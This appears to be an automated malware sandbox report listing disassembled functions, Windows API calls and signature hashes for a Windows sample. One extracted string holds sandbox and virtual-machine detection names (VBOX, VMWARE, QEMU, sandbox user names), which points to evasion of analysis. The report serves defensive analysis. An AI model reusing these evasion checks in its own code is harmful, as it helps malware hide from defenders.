                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: Process$CurrentPrng
                                            • String ID:
                                            • API String ID: 716580790-0
                                            • Opcode ID: c8928d5f51c56d2f59684b6c8d261d04b54f34b2b64c57bd3e0c046a5bc1a12a
                                            • Instruction ID: 7208bfd52bc82c723d3bbbc37436f0814e5a0927f2993ea0398129308e7768e3
                                            • Opcode Fuzzy Hash: c8928d5f51c56d2f59684b6c8d261d04b54f34b2b64c57bd3e0c046a5bc1a12a
                                            • Instruction Fuzzy Hash: 5F22E462A09A8289E7649F29D9003FA7AB4FB1A798F404235DF6E47798DF7DD144C310
                                            Function 00007FF7B902EB20 Relevance: 4.6, APIs: 3, Instructions: 143fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CloseFind$FileFirstHandle
                                            • String ID:
                                            • API String ID: 1310327803-0
                                            • Opcode ID: 108ad1669d5f654cf7088fbd5db76f8917ec5f9a1101b15b5fb6b39ab74f4e40
                                            • Instruction ID: cdfffae1c08a1d30c16b4960e8c21b7e23b45977aa25b424639e4b407d5f90f0
                                            • Opcode Fuzzy Hash: 108ad1669d5f654cf7088fbd5db76f8917ec5f9a1101b15b5fb6b39ab74f4e40
                                            • Instruction Fuzzy Hash: E7518032A04B8286E7309F65E8843EAB771FB66798F504235CF6D1AB99DF3CE5418350
                                            Function 00007FF7B902F200 Relevance: 4.6, APIs: 3, Instructions: 83filenativesynchronizationCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorFileObjectSingleStatusWaitWrite
                                            • String ID:
                                            • API String ID: 3447438843-0
                                            • Opcode ID: 83d7b160387bc71befc0e2236d4a3df64de8f29feef33d0b9e5494b388aa95c9
                                            • Instruction ID: 12264b5238a504de655ab048e8148ecf2e09e520d9edc9f28c9dd45cccc67eb2
                                            • Opcode Fuzzy Hash: 83d7b160387bc71befc0e2236d4a3df64de8f29feef33d0b9e5494b388aa95c9
                                            • Instruction Fuzzy Hash: D131AF32B04B429AE710DF78E8907ED73B0EB66398F904130EB5D43A98EF38D5948750
                                            Function 00007FF7B902F0E0 Relevance: 4.6, APIs: 3, Instructions: 75filenativesynchronizationCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorFileObjectReadSingleStatusWait
                                            • String ID:
                                            • API String ID: 3583596364-0
                                            • Opcode ID: 6b2b8c81433aba9b8012bb8a5dc3d03e10c04479521bde7f886105c347d82123
                                            • Instruction ID: 272e8d1bd351b0e37f8b198d9c19126491cc535954e1642e1ccab9a5172f8075
                                            • Opcode Fuzzy Hash: 6b2b8c81433aba9b8012bb8a5dc3d03e10c04479521bde7f886105c347d82123
                                            • Instruction Fuzzy Hash: 02318172B04B5299F710DF78E8407E973B5AB66398F904130EB5D82A98EF3CD5948750
                                            Function 00007FF7B901CBF0 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2873 7ff7b901cbf0-7ff7b901cc01 2874 7ff7b901cc62 2873->2874 2875 7ff7b901cc03-7ff7b901cc1d 2873->2875 2877 7ff7b901cc64-7ff7b901cc74 2874->2877 2876 7ff7b901cc28-7ff7b901cc4a BCryptGenRandom 2875->2876 2878 7ff7b901cc4c-7ff7b901cc58 SystemFunction036 2876->2878 2879 7ff7b901cc20-7ff7b901cc26 2876->2879 2878->2879 2880 7ff7b901cc5a-7ff7b901cc60 2878->2880 2879->2874 2879->2876 2880->2877
                                            APIs
                                            • BCryptGenRandom.BCRYPT(?,?,?,00007FF7B901C955,?,?,?,00007FF7B904D87B), ref: 00007FF7B901CC42
                                            • SystemFunction036.ADVAPI32(?,?,?,00007FF7B901C955,?,?,?,00007FF7B904D87B), ref: 00007FF7B901CC53
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CryptFunction036RandomSystem
                                            • String ID:
                                            • API String ID: 1232939966-0
                                            • Opcode ID: 156b8d29b021a0b699b54c0dc488f79796eb3c5d946079082ee26368548ee791
                                            • Instruction ID: 97aa3559aff75915d0179959bc38f0e2853e6deb6df882a49d295fdcb9809219
                                            • Opcode Fuzzy Hash: 156b8d29b021a0b699b54c0dc488f79796eb3c5d946079082ee26368548ee791
                                            • Instruction Fuzzy Hash: 22F0F422F0917691F9607E6B2E44534D1622F26BF0DA84731FE3C877E8BC28DC824210
                                            Function 00007FF7B901DA70 Relevance: 1.6, APIs: 1, Instructions: 75timeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3099 7ff7b901da70-7ff7b901daac GetTimeZoneInformationForYear 3100 7ff7b901db4f 3099->3100 3101 7ff7b901dab2-7ff7b901dad9 3099->3101 3102 7ff7b901db55-7ff7b901db61 3100->3102 3101->3100 3103 7ff7b901dadb-7ff7b901dade 3101->3103 3103->3100 3104 7ff7b901dae0-7ff7b901daec 3103->3104 3104->3100 3105 7ff7b901daee-7ff7b901daf5 3104->3105 3105->3100 3106 7ff7b901daf7-7ff7b901dafb 3105->3106 3106->3100 3107 7ff7b901dafd-7ff7b901db09 3106->3107 3107->3100 3108 7ff7b901db0b-7ff7b901db22 call 7ff7b901dba0 3107->3108 3108->3100 3111 7ff7b901db24-7ff7b901db4d call 7ff7b901dba0 3108->3111 3111->3100 3114 7ff7b901db62-7ff7b901db94 3111->3114 3114->3102
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: InformationTimeYearZone
                                            • String ID:
                                            • API String ID: 2325421820-0
                                            • Opcode ID: 00a454c135f09f1f250e6a997138a96e1f69e719d8c17f8820de649a108718ef
                                            • Instruction ID: 83e565ca548d10dfd16f5793054f28230c7735f4d00d02c9d5d01cd91b9a33b3
                                            • Opcode Fuzzy Hash: 00a454c135f09f1f250e6a997138a96e1f69e719d8c17f8820de649a108718ef
                                            • Instruction Fuzzy Hash: 56313232608692C6E725DF19E0847AAF7B1E7D9354F404035EB9A47B59EB7CE085CF10
                                            Function 00007FF7B9018B20 Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                            Download Yara Rule
                                            Strings
                                            • /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel, xrefs: 00007FF7B9018B4D, 00007FF7B9018E1A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
                                            • API String ID: 0-984818510
                                            • Opcode ID: 97c764e578281867c64b0fca19dff450a4063e0231973d55c4d4325fceece58d
                                            • Instruction ID: 4e6b2bd2af0c165d64281b9f6d9f93a0c657b0904c3c9cc4157bea2cc206f87d
                                            • Opcode Fuzzy Hash: 97c764e578281867c64b0fca19dff450a4063e0231973d55c4d4325fceece58d
                                            • Instruction Fuzzy Hash: 9D918022A08B62C5E710AF29D8403ACB7B0FB5AB98F554535EF6C17789DF38D281C360
                                            Function 00007FF7B902A610 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 203synchronizationCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1763 7ff7b902a610-7ff7b902a65c call 7ff7b90318f0 1766 7ff7b902a662-7ff7b902a691 1763->1766 1767 7ff7b902a885-7ff7b902a896 1763->1767 1769 7ff7b902a699-7ff7b902a6f4 1766->1769 1770 7ff7b902a693 CloseHandle 1766->1770 1768 7ff7b902a8c7-7ff7b902a8dd 1767->1768 1771 7ff7b902a756-7ff7b902a759 1769->1771 1772 7ff7b902a6f6-7ff7b902a6f9 1769->1772 1770->1769 1773 7ff7b902a75b-7ff7b902a775 call 7ff7b9030950 1771->1773 1774 7ff7b902a7c0-7ff7b902a7da WaitForSingleObject 1771->1774 1775 7ff7b902a78d-7ff7b902a7b1 call 7ff7b9030950 1772->1775 1776 7ff7b902a6ff-7ff7b902a719 call 7ff7b9030d20 1772->1776 1789 7ff7b902a8de-7ff7b902a910 call 7ff7b904f870 1773->1789 1790 7ff7b902a77b-7ff7b902a78b CloseHandle 1773->1790 1779 7ff7b902a7dc-7ff7b902a7eb GetLastError 1774->1779 1780 7ff7b902a821-7ff7b902a83d GetExitCodeProcess 1774->1780 1791 7ff7b902a7b7-7ff7b902a7ba CloseHandle 1775->1791 1792 7ff7b902a912-7ff7b902a93f call 7ff7b904f870 1775->1792 1776->1774 1794 7ff7b902a71f-7ff7b902a751 call 7ff7b904f870 1776->1794 1785 7ff7b902a7ed-7ff7b902a7f7 call 7ff7b901a130 1779->1785 1786 7ff7b902a7fc-7ff7b902a807 1779->1786 1780->1779 1782 7ff7b902a83f-7ff7b902a861 1780->1782 1788 7ff7b902a865-7ff7b902a880 CloseHandle * 2 1782->1788 1785->1786 1795 7ff7b902a809-7ff7b902a813 call 7ff7b901a130 1786->1795 1796 7ff7b902a818-7ff7b902a81f 1786->1796 1798 7ff7b902a898-7ff7b902a8c3 1788->1798 1799 7ff7b902a882 1788->1799 1805 7ff7b902a944-7ff7b902a98a CloseHandle 1789->1805 1790->1774 1791->1774 1792->1805 1794->1805 1795->1796 1796->1788 1798->1768 1799->1767
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait
                                            • String ID: called `Result::unwrap()` on an `Err` value
                                            • API String ID: 17306042-2333694755
                                            • Opcode ID: 98050de64407eec83e84d274591eb1f76851ba59d11f64f5e6645ddd7a7c7f19
                                            • Instruction ID: 2db730b11b43736a6d2a8f1d0437612f05866c3b10069a8452be78bad8b6f4a2
                                            • Opcode Fuzzy Hash: 98050de64407eec83e84d274591eb1f76851ba59d11f64f5e6645ddd7a7c7f19
                                            • Instruction Fuzzy Hash: CFA14E32A04B8299E7609F39E8403E973B0FB5A798F958125EF6D07B99DF38D185C350
                                            Function 00007FF7B9048BE4 Relevance: 12.1, APIs: 8, Instructions: 94COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                            • String ID:
                                            • API String ID: 1804101941-0
                                            • Opcode ID: eee810bb95535470bffe68d2ba9a8a383abc4ee3ff95bb7e2462f86346f6db18
                                            • Instruction ID: dea37d29d0542fcfe3efdfdc4c4cd612591d9041f078524b778c40b7303f0144
                                            • Opcode Fuzzy Hash: eee810bb95535470bffe68d2ba9a8a383abc4ee3ff95bb7e2462f86346f6db18
                                            • Instruction Fuzzy Hash: BF311B21A0D14382EA54BF2D94553B9A3B1AFA7784FC44835EB6D473EFDE2CE8448620
                                            Function 00007FF7B902E610 Relevance: 9.2, APIs: 6, Instructions: 184fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1857 7ff7b902e610-7ff7b902e64e call 7ff7b90384d0 1860 7ff7b902e65a-7ff7b902e68a call 7ff7b9039f80 1857->1860 1861 7ff7b902e650-7ff7b902e655 1857->1861 1865 7ff7b902e68c-7ff7b902e68f 1860->1865 1866 7ff7b902e694-7ff7b902e6a0 1860->1866 1862 7ff7b902e7ff-7ff7b902e80e 1861->1862 1865->1862 1867 7ff7b902e6ac-7ff7b902e6ae 1866->1867 1868 7ff7b902e6a2-7ff7b902e6a4 1866->1868 1869 7ff7b902e6b0-7ff7b902e6b8 1867->1869 1871 7ff7b902e6f5-7ff7b902e6f9 1867->1871 1868->1869 1870 7ff7b902e6a6-7ff7b902e6aa 1868->1870 1874 7ff7b902e709-7ff7b902e70d 1869->1874 1875 7ff7b902e6ba-7ff7b902e6bc 1869->1875 1870->1874 1872 7ff7b902e6be-7ff7b902e6cb 1871->1872 1873 7ff7b902e6fb-7ff7b902e6ff 1871->1873 1872->1862 1879 7ff7b902e6d1-7ff7b902e6f0 call 7ff7b901a130 1872->1879 1873->1872 1876 7ff7b902e701-7ff7b902e705 1873->1876 1877 7ff7b902e742-7ff7b902e744 1874->1877 1878 7ff7b902e70f-7ff7b902e711 1874->1878 1875->1872 1875->1874 1876->1872 1880 7ff7b902e707 1876->1880 1881 7ff7b902e74a-7ff7b902e753 1877->1881 1883 7ff7b902e83f-7ff7b902e84f 1877->1883 1878->1881 1882 7ff7b902e713-7ff7b902e71c 1878->1882 1879->1862 1880->1874 1886 7ff7b902e71e-7ff7b902e722 1881->1886 1887 7ff7b902e755 1881->1887 1882->1886 1882->1887 1883->1887 1888 7ff7b902e855 1883->1888 1889 7ff7b902e728-7ff7b902e740 1886->1889 1890 7ff7b902e82c-7ff7b902e82f 1886->1890 1891 7ff7b902e758-7ff7b902e799 CreateFileW 1887->1891 1892 7ff7b902e85a-7ff7b902e877 GetLastError CloseHandle 1888->1892 1889->1891 1893 7ff7b902e89a-7ff7b902e89c 1890->1893 1894 7ff7b902e831-7ff7b902e833 1890->1894 1895 7ff7b902e79b-7ff7b902e7a2 1891->1895 1896 7ff7b902e80f-7ff7b902e828 GetLastError 1891->1896 1897 7ff7b902e879-7ff7b902e888 call 7ff7b901a130 1892->1897 1898 7ff7b902e88d-7ff7b902e895 1892->1898 1893->1872 1899 7ff7b902e8a2-7ff7b902e8a7 1893->1899 1894->1899 1902 7ff7b902e835-7ff7b902e83a 1894->1902 1903 7ff7b902e7db-7ff7b902e7e0 1895->1903 1904 7ff7b902e7a4-7ff7b902e7a8 1895->1904 1900 7ff7b902e82a 1896->1900 1901 7ff7b902e7e2-7ff7b902e7f9 call 7ff7b901a130 1896->1901 1897->1898 1898->1862 1899->1891 1907 7ff7b902e7fc 1900->1907 1901->1907 1902->1891 1903->1901 1903->1907 1904->1903 1905 7ff7b902e7aa-7ff7b902e7b5 GetLastError 1904->1905 1905->1903 1909 7ff7b902e7b7-7ff7b902e7d9 SetFileInformationByHandle 1905->1909 1907->1862 1909->1892 1909->1903
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FileHandle$CloseCreateInformation
                                            • String ID:
                                            • API String ID: 1617036312-0
                                            • Opcode ID: 0ddb327ce91df9d84e5046fd063802ff5ba92c5831474f6817db1fb96f3d3a89
                                            • Instruction ID: 6ef4f285d6c8a37570db7eda84510f3e2a750906e17bb684523ce09a945198cb
                                            • Opcode Fuzzy Hash: 0ddb327ce91df9d84e5046fd063802ff5ba92c5831474f6817db1fb96f3d3a89
                                            • Instruction Fuzzy Hash: B371B351E4825346FB656E2994083F9BAB1AF36B98F944131CF6D17BCDDE3CD8858320
                                            Function 00007FF7B9024CA0 Relevance: 9.1, APIs: 6, Instructions: 81timesleepsynchronizationCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1911 7ff7b9024ca0-7ff7b9024cb7 1912 7ff7b9024cb9-7ff7b9024cbb 1911->1912 1913 7ff7b9024cc1-7ff7b9024cda CreateWaitableTimerExW 1911->1913 1912->1913 1914 7ff7b9024d5a-7ff7b9024d6a 1912->1914 1913->1914 1915 7ff7b9024cdc-7ff7b9024cea 1913->1915 1916 7ff7b9024d6c-7ff7b9024d7c 1914->1916 1917 7ff7b9024d9e Sleep 1914->1917 1918 7ff7b9024cec-7ff7b9024cfc 1915->1918 1919 7ff7b9024d51-7ff7b9024d54 CloseHandle 1915->1919 1916->1917 1920 7ff7b9024d7e-7ff7b9024d90 1916->1920 1921 7ff7b9024da4-7ff7b9024daf 1917->1921 1918->1919 1922 7ff7b9024cfe 1918->1922 1919->1914 1920->1917 1923 7ff7b9024d92-7ff7b9024d9a 1920->1923 1922->1919 1924 7ff7b9024d00-7ff7b9024d2d SetWaitableTimer 1922->1924 1923->1917 1924->1919 1925 7ff7b9024d2f-7ff7b9024d4d WaitForSingleObject CloseHandle 1924->1925 1925->1921 1926 7ff7b9024d4f 1925->1926 1926->1914
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                            • String ID:
                                            • API String ID: 2261246915-0
                                            • Opcode ID: abd99af6bd88042d1dd5512cba818c5c5812610d3b38a9f3d41f1412972b137f
                                            • Instruction ID: 376d799660e9aaf7a87c172b1218cfc2cc6b4155b41863ca5cbe5cb876da8aee
                                            • Opcode Fuzzy Hash: abd99af6bd88042d1dd5512cba818c5c5812610d3b38a9f3d41f1412972b137f
                                            • Instruction Fuzzy Hash: BB21D622F0571302FB58AF396915778B2769FA77A4F848234DE3E42BE8DE3CE4414620
                                            Function 00007FF7B90246C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2162 7ff7b90246c0-7ff7b9024733 AddVectoredExceptionHandler SetThreadStackGuarantee GetCurrentThread SetThreadDescription call 7ff7b9024db0 call 7ff7b9024ab0 2172 7ff7b9024736 call 7ff7b901906a 2162->2172 2173 7ff7b9024736 call 7ff7b9018fe9 2162->2173 2174 7ff7b9024736 call 7ff7b901902b 2162->2174 2175 7ff7b9024736 call 7ff7b9018fed 2162->2175 2176 7ff7b9024736 call 7ff7b9018ef0 2162->2176 2177 7ff7b9024736 call 7ff7b9019032 2162->2177 2178 7ff7b9024736 call 7ff7b9019071 2162->2178 2179 7ff7b9024736 call 7ff7b9018ff1 2162->2179 2180 7ff7b9024736 call 7ff7b9018fb5 2162->2180 2181 7ff7b9024736 call 7ff7b9018ff5 2162->2181 2182 7ff7b9024736 call 7ff7b9018f5a 2162->2182 2183 7ff7b9024736 call 7ff7b9018fd9 2162->2183 2184 7ff7b9024736 call 7ff7b901905c 2162->2184 2185 7ff7b9024736 call 7ff7b9018fdd 2162->2185 2186 7ff7b9024736 call 7ff7b9018fa0 2162->2186 2187 7ff7b9024736 call 7ff7b9018fe1 2162->2187 2188 7ff7b9024736 call 7ff7b9019024 2162->2188 2189 7ff7b9024736 call 7ff7b9019063 2162->2189 2190 7ff7b9024736 call 7ff7b9018fe5 2162->2190 2191 7ff7b9024736 call 7ff7b9019008 2162->2191 2192 7ff7b9024736 call 7ff7b9019047 2162->2192 2193 7ff7b9024736 call 7ff7b9018fc9 2162->2193 2194 7ff7b9024736 call 7ff7b901904e 2162->2194 2195 7ff7b9024736 call 7ff7b9018fcd 2162->2195 2196 7ff7b9024736 call 7ff7b901900f 2162->2196 2197 7ff7b9024736 call 7ff7b9018fd1 2162->2197 2198 7ff7b9024736 call 7ff7b9019016 2162->2198 2199 7ff7b9024736 call 7ff7b9019055 2162->2199 2200 7ff7b9024736 call 7ff7b9018fd5 2162->2200 2201 7ff7b9024736 call 7ff7b9019078 2162->2201 2202 7ff7b9024736 call 7ff7b9019039 2162->2202 2203 7ff7b9024736 call 7ff7b9018fb9 2162->2203 2204 7ff7b9024736 call 7ff7b9018ff9 2162->2204 2205 7ff7b9024736 call 7ff7b9018fbd 2162->2205 2206 7ff7b9024736 call 7ff7b9018ffd 2162->2206 2207 7ff7b9024736 call 7ff7b9019040 2162->2207 2208 7ff7b9024736 call 7ff7b9018f80 2162->2208 2209 7ff7b9024736 call 7ff7b901907f 2162->2209 2210 7ff7b9024736 call 7ff7b9018fc1 2162->2210 2211 7ff7b9024736 call 7ff7b9019001 2162->2211 2212 7ff7b9024736 call 7ff7b9018fc5 2162->2212 2167 7ff7b9024739-7ff7b9024745 2169 7ff7b9024747-7ff7b9024757 call 7ff7b904e500 2167->2169 2170 7ff7b902475c-7ff7b9024769 2167->2170 2169->2170 2172->2167 2173->2167 2174->2167 2175->2167 2176->2167 2177->2167 2178->2167 2179->2167 2180->2167 2181->2167 2182->2167 2183->2167 2184->2167 2185->2167 2186->2167 2187->2167 2188->2167 2189->2167 2190->2167 2191->2167 2192->2167 2193->2167 2194->2167 2195->2167 2196->2167 2197->2167 2198->2167 2199->2167 2200->2167 2201->2167 2202->2167 2203->2167 2204->2167 2205->2167 2206->2167 2207->2167 2208->2167 2209->2167 2210->2167 2211->2167 2212->2167
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2466110561.00007FF7B9011000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B9010000, based on PE: true
                                            • Associated: 00000000.00000002.2466080486.00007FF7B9010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466159313.00007FF7B9050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466199351.00007FF7B906A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2466230411.00007FF7B906B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7b9010000_9KEZfGRjyK.jbxd
                                            Similarity
                                            • API ID: Thread$CurrentDescriptionExceptionGuaranteeHandlerStackVectored
                                            • String ID: main
                                            • API String ID: 3663057573-3207122276
                                            • Opcode ID: aff96ae2daea4c37a3667f91690bbb9d7f047d6ef6fcb56457d51776b9872f87
                                            • Instruction ID: 2635c0765a31ef78c38c18bc365ddb36d1f8f1a3ff2d3aaa5f1305035ae79225
